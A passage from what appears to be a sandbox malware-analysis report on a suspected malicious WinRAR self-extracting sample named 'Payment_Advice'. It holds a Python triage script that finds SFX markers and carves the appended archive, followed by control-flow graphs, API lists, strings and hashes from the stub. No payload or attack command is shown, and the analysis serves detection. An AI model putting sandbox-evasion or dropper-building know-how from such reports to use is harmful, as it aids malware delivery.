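    result = SfxTriage(is_pe=data[:2] == b"MZ")
    for name, text in SFX_MARKERS.items():
        off = data.find(text.encode("utf-16-le"))
        if off != -1:
            result.markers_found[name] = off
    # The archive is appended after the stub image; take the earliest hit.
    hits = [(data.find(sig), ver) for sig, ver in ((RAR5_SIG, "RAR5"), (RAR4_SIG, "RAR4"))]
    hits = [(off, ver) for off, ver in hits if off != -1]
    if hits:
        result.rar_offset, result.rar_version = min(hits)
    return result


def carve_archive(data: bytes) -> Optional[bytes]:
    """Return the appended archive bytes (for offline extraction), or None."""
    t = triage(data)
    return None if t.rar_offset is None else data[t.rar_offset:]


def _w(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed stand-in for a stub: an MZ header, the wide-string markers, and an
# appended RAR5 header.  These are NOT bytes from the real sample.
CONSTRUCTED_STUB = (
    b"MZ" + b"\x00" * 62
    + _w("winrarsfxmappingfile.tmp") + b"\x00\x00"
    + _w("STARTDLG") + b"\x00\x00"
    + _w("sfxcmd") + b"\x00\x00" + _w("sfxname") + b"\x00\x00" + _w("sfxstime") + b"\x00\x00"
    + b"\x00" * 16
    + RAR5_SIG + b"\x0b\x00\x00\x00"  # filler after the signature
)

if __name__ == "__main__":
    t = triage(CONSTRUCTED_STUB)
    print("WinRAR SFX:", t.is_winrar_sfx, "markers:", sorted(t.markers_found))
    print("archive:", t.rar_version, "at offset", t.rar_offset)
```

Run `triage()` on the raw file from disk (not on the memory dump: the appended archive is not part of the mapped image) and feed the carved bytes to an archive tool in an isolated environment. A hit on the markers without an archive signature usually means a modified or non-RAR SFX builder, which is worth a manual look.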

                                                                                                    Control-flow Graph

Basic blocks and transitions of the PNG resource loader at 51a6c2 (the executed / not-executed colouring of the interactive graph is not preserved in the text export):
• 51a6c2-51a6df FindResourceW → 51a6e5 (found) | 51a7db (fail)
• 51a6e5-51a6f6 SizeofResource → 51a6fc | 51a7db
• 51a6fc-51a70b LoadResource → 51a711 | 51a7db
• 51a711-51a71c LockResource → 51a722 | 51a7db
• 51a722-51a737 GlobalAlloc → 51a73d | 51a7d3
• 51a73d-51a746 GlobalLock → 51a74c | 51a7cc (GlobalFree)
• 51a74c-51a76a call 520320 → 51a76c | 51a7c5 (GlobalUnlock)
• 51a76c-51a78e call 51a626 → 51a790 | 51a7c5
• 51a790-51a798 → 51a79a | 51a7b3
• 51a79a-51a7ae GdipCreateHBITMAPFromBitmap → 51a7b0 → 51a7b3 | 51a7b3
• 51a7b3-51a7c1 → 51a7c5 GlobalUnlock → 51a7cc GlobalFree → 51a7d3-51a7d9 → 51a7dd-51a7e1 (return)
• 51a7db → 51a7dd-51a7e1 (return)
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0051B73D,00000066), ref: 0051A6D5
                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A6EC
                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A703
                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A712
                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A72D
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A73E
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0051A7C6
                                                                                                      • Part of subcall function 0051A626: GdipAlloc.GDIPLUS(00000010), ref: 0051A62C
                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0051A7A7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0051A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                    • String ID: FvnQ$PNG
                                                                                                    • API String ID: 541704414-2645278782
                                                                                                    • Opcode ID: c55fb92867185f7450c0b85ed215be295b34a5ec911870bfa6e43d2961273e12
                                                                                                    • Instruction ID: ed2a42bc0f2e1dc95c84d98f232f29d1b0e83a05cab117e75e7ad1994ae0e81f
                                                                                                    • Opcode Fuzzy Hash: c55fb92867185f7450c0b85ed215be295b34a5ec911870bfa6e43d2961273e12
                                                                                                    • Instruction Fuzzy Hash: 4F319379601702AFE7119F21EC88D6B7FB9FF95761B040919F805C22A1EB31DD88EB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                                                    Basic blocks:
                                                                                                    • 1061: 50a69b-50a6bf, call 51ec50
                                                                                                    • 1064: 50a6c1-50a6ce, FindFirstFileW
                                                                                                    • 1065: 50a727-50a730, FindNextFileW
                                                                                                    • 1066: 50a6d0-50a6e2, call 50bb03
                                                                                                    • 1067: 50a742-50a7ff, call 510602, call 50c310, call 5115da * 3
                                                                                                    • 1068: 50a732-50a740, GetLastError
                                                                                                    • 1069: 50a719-50a722
                                                                                                    • 1074: 50a804-50a811
                                                                                                    • 1076: 50a6e4-50a6fc, FindFirstFileW
                                                                                                    • 1077: 50a6fe-50a707, GetLastError
                                                                                                    • 1079: 50a717
                                                                                                    • 1080: 50a709-50a70c
                                                                                                    • 1082: 50a70e-50a711
                                                                                                    • 1084: 50a713-50a715
                                                                                                    Edges:
                                                                                                    • 1061->1064, 1061->1065, 1064->1066, 1064->1067, 1065->1067, 1065->1068, 1066->1076, 1066->1077
                                                                                                    • 1067->1074, 1068->1069, 1069->1074, 1076->1067, 1076->1077, 1077->1079, 1077->1080
                                                                                                    • 1079->1069, 1080->1079, 1080->1082, 1082->1079, 1082->1084, 1084->1069
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6C4
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6F2
                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6FE
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A728
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0050A592,000000FF,?,?), ref: 0050A734
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 42610566-0
                                                                                                    • Opcode ID: db087829411246b868f689709e89edc57114701962d1c1211f6b0dd1d705e3e6
                                                                                                    • Instruction ID: 2c6c818fa8da439dacfb9a5a7500b2a66375f2bea7502245319d67ad7f79ca51
                                                                                                    • Opcode Fuzzy Hash: db087829411246b868f689709e89edc57114701962d1c1211f6b0dd1d705e3e6
                                                                                                    • Instruction Fuzzy Hash: 16417176900615ABCB25DF68CC88AEDBBB8FB48350F144196F95AD3240D7346E94CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002,00000000), ref: 00527E0F
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002,00000000), ref: 00527E16
                                                                                                    • ExitProcess.KERNEL32 ref: 00527E28
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 53b270b7809befb67c00d50076c544e51eceebcbe30ad193a9c3db732b2285cf
                                                                                                    • Instruction ID: d6e05ecd2fa5a74975f1aafa78612d6d0ef2af3b74b21a026df49a9750a12314
                                                                                                    • Opcode Fuzzy Hash: 53b270b7809befb67c00d50076c544e51eceebcbe30ad193a9c3db732b2285cf
                                                                                                    • Instruction Fuzzy Hash: B6E04631000158ABCF02AF60ED0DA4A3F6AFF65341F014494F8098B272CB36DE96EAA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 4ee35c1654bf793e9adb691d9fd74fd7ead413fca013bc92fe41bd5f845bace2
                                                                                                    • Instruction ID: 441d3ac4965c0367abd97d1f7359e9bcb74d10fcbfa1cea6c26aa3d7c6bc5ade
                                                                                                    • Opcode Fuzzy Hash: 4ee35c1654bf793e9adb691d9fd74fd7ead413fca013bc92fe41bd5f845bace2
                                                                                                    • Instruction Fuzzy Hash: 2C82FA71904246AEDF25DB64C895FFEBF79BF45300F0845B9D8899B2C2DB315A88CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 8ec6413e0ff385e40912b27040b2676d767fb66dc60c54220d2d9b8823dfd21d
                                                                                                    • Instruction ID: 22f32abcac111278c3226d92e5c970f9a2ef90020ec172ac8a618ae898a41446
                                                                                                    • Opcode Fuzzy Hash: 8ec6413e0ff385e40912b27040b2676d767fb66dc60c54220d2d9b8823dfd21d
                                                                                                    • Instruction Fuzzy Hash: 30D1C5B16083458FEB14CF28D84479BBFE5BF89308F044A6DE8899B242D774ED85CB56
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051B7E5
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051B8D1
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B8EF
                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0051B902
                                                                                                    • TranslateMessage.USER32(?), ref: 0051B910
                                                                                                    • DispatchMessageW.USER32(?), ref: 0051B91A
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0051B93D
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051B960
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0051B983
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0051B99E
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005335F4), ref: 0051B9B1
                                                                                                      • Part of subcall function 0051D453: _wcschr.LIBVCRUNTIME ref: 0051D45C
                                                                                                      • Part of subcall function 0051D453: _wcslen.LIBCMT ref: 0051D47D
                                                                                                    • SetFocus.USER32(00000000), ref: 0051B9B8
                                                                                                    • _swprintf.LIBCMT ref: 0051BA24
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                      • Part of subcall function 0051D4D4: GetDlgItem.USER32(00000068,0055FCB8), ref: 0051D4E8
                                                                                                      • Part of subcall function 0051D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0051AF07,00000001,?,?,0051B7B9,0053506C,0055FCB8,0055FCB8,00001000,00000000,00000000), ref: 0051D510
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0051D51B
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005335F4), ref: 0051D529
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D53F
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0051D559
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D59D
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0051D5AB
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D5BA
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D5E1
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005343F4), ref: 0051D5F0
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0051BA68
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0051BA90
                                                                                                    • GetTickCount.KERNEL32 ref: 0051BAAE
                                                                                                    • _swprintf.LIBCMT ref: 0051BAC2
                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0051BAF4
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0051BB43
                                                                                                    • _swprintf.LIBCMT ref: 0051BB7C
                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0051BBD0
                                                                                                    • GetCommandLineW.KERNEL32 ref: 0051BBEA
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0051BC47
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0051BC6F
                                                                                                    • WaitForInputIdle.USER32(?,00002710), ref: 0051BCA5
                                                                                                    • Sleep.KERNEL32(00000064), ref: 0051BCB9
                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0051BCE2
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0051BCEB
                                                                                                    • _swprintf.LIBCMT ref: 0051BD1E
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051BD7D
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,005335F4), ref: 0051BD94
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0051BD9D
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0051BDAC
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0051BDBB
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051BE68
                                                                                                    • _wcslen.LIBCMT ref: 0051BEBE
                                                                                                    • _swprintf.LIBCMT ref: 0051BEE8
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0051BF32
                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0051BF4C
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0051BF55
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0051BF6B
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0051BF85
                                                                                                    • SetWindowTextW.USER32(00000000,0054A472), ref: 0051BFA7
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0051C007
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051C01A
                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0051C0BD
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0051C197
                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0051C1D9
                                                                                                      • Part of subcall function 0051C73F: __EH_prolog.LIBCMT ref: 0051C744
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051C1FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l_wcschr
                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^Q$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$QS
                                                                                                    • API String ID: 270980416-3271375000
                                                                                                    • Opcode ID: b81ac8c5e16a506c98127ecea510a7e419fa4d50bc48abf5272a019b60e8087f
                                                                                                    • Instruction ID: 5b0abd055cbbb93df6f38e6053b729477b8d9c4c7174a44dbd48f6c31c35ebff
                                                                                                    • Opcode Fuzzy Hash: b81ac8c5e16a506c98127ecea510a7e419fa4d50bc48abf5272a019b60e8087f
                                                                                                    • Instruction Fuzzy Hash: E742E174984245BAFB21AB649C4EFFE3F6CBB62704F040095F641A61D2CBB55E8CDB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 267 510863-510886 call 51ec50 GetModuleHandleW 270 5108e7-510b48 267->270 271 510888-51089f GetProcAddress 267->271 274 510c14-510c40 GetModuleFileNameW call 50c29a call 510602 270->274 275 510b4e-510b59 call 5275fb 270->275 272 5108a1-5108b7 271->272 273 5108b9-5108c9 GetProcAddress 271->273 272->273 276 5108e5 273->276 277 5108cb-5108e0 273->277 289 510c42-510c4e call 50b146 274->289 275->274 283 510b5f-510b8d GetModuleFileNameW CreateFileW 275->283 276->270 277->276 286 510c08-510c0f CloseHandle 283->286 287 510b8f-510b9b SetFilePointer 283->287 286->274 287->286 290 510b9d-510bb9 ReadFile 287->290 296 510c50-510c5b call 51081b 289->296 297 510c7d-510ca4 call 50c310 GetFileAttributesW 289->297 290->286 293 510bbb-510be0 290->293 295 510bfd-510c06 call 510371 293->295 295->286 304 510be2-510bfc call 51081b 295->304 296->297 306 510c5d-510c7b CompareStringW 296->306 307 510ca6-510caa 297->307 308 510cae 297->308 304->295 306->297 306->307 307->289 310 510cac 307->310 311 510cb0-510cb5 308->311 310->311 312 510cb7 311->312 313 510cec-510cee 311->313 316 510cb9-510ce0 call 50c310 GetFileAttributesW 312->316 314 510cf4-510d0b call 50c2e4 call 50b146 313->314 315 510dfb-510e05 313->315 326 510d73-510da6 call 504092 AllocConsole 314->326 327 510d0d-510d6e call 51081b * 2 call 50e617 call 504092 call 50e617 call 51a7e4 314->327 321 510ce2-510ce6 316->321 322 510cea 316->322 321->316 324 510ce8 321->324 322->313 324->313 332 510df3-510df5 ExitProcess 326->332 333 510da8-510ded GetCurrentProcessId AttachConsole call 523e13 GetStdHandle WriteConsoleW Sleep FreeConsole 326->333 327->332 333->332
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0051087C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0051088E
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005108BF
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00510B69
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00510B83
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00510B93
                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<S,00000000), ref: 00510BB1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00510C09
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00510C1E
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<S,?,00000000,?,00000800), ref: 00510C72
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<S,00000800,?,00000000,?,00000800), ref: 00510C9C
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=S,00000800), ref: 00510CD8
                                                                                                      • Part of subcall function 0051081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                      • Part of subcall function 0051081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    • _swprintf.LIBCMT ref: 00510D4A
                                                                                                    • _swprintf.LIBCMT ref: 00510D96
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • AllocConsole.KERNEL32 ref: 00510D9E
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00510DA8
                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00510DAF
                                                                                                    • _wcslen.LIBCMT ref: 00510DC4
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00510DD5
                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00510DDC
                                                                                                    • Sleep.KERNEL32(00002710), ref: 00510DE7
                                                                                                    • FreeConsole.KERNEL32 ref: 00510DED
                                                                                                    • ExitProcess.KERNEL32 ref: 00510DF5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                    • String ID: (=S$,<S$,@S$0?S$0AS$4BS$8>S$D=S$DXGIDebug.dll$H?S$H@S$HAS$P>S$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=S$`@S$d?S$dAS$dwmapi.dll$h=S$h>S$kernel32$uxtheme.dll$|<S$|?S$|@S$<S$>S$?S$@S$AS
                                                                                                    • API String ID: 1207345701-2759046448
                                                                                                    • Opcode ID: 68d8e87b15c8e2248e49db3e3633965fab5e88bf1fd7cc4a15cc7a53eb672c1d
                                                                                                    • Instruction ID: 08f9e77566da7da94ce45122e9c30494300010282e7052befd1904d31e7a0df3
                                                                                                    • Opcode Fuzzy Hash: 68d8e87b15c8e2248e49db3e3633965fab5e88bf1fd7cc4a15cc7a53eb672c1d
                                                                                                    • Instruction Fuzzy Hash: 9DD171B1008385ABD3259F50D84DADFBFE8BF85704F50491DF1859A290DBB49A88CFA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0050DA70
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0050DA91
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0050DAAC
                                                                                                      • Part of subcall function 0050C29A: _wcslen.LIBCMT ref: 0050C2A2
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                      • Part of subcall function 00511B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0050BAE9,00000000,?,?,?,00010440), ref: 00511BA0
                                                                                                    • _wcslen.LIBCMT ref: 0050DDE9
                                                                                                    • __fprintf_l.LIBCMT ref: 0050DF1C
                                                                                                    Strings
                                                                                                    Memory Dump Source
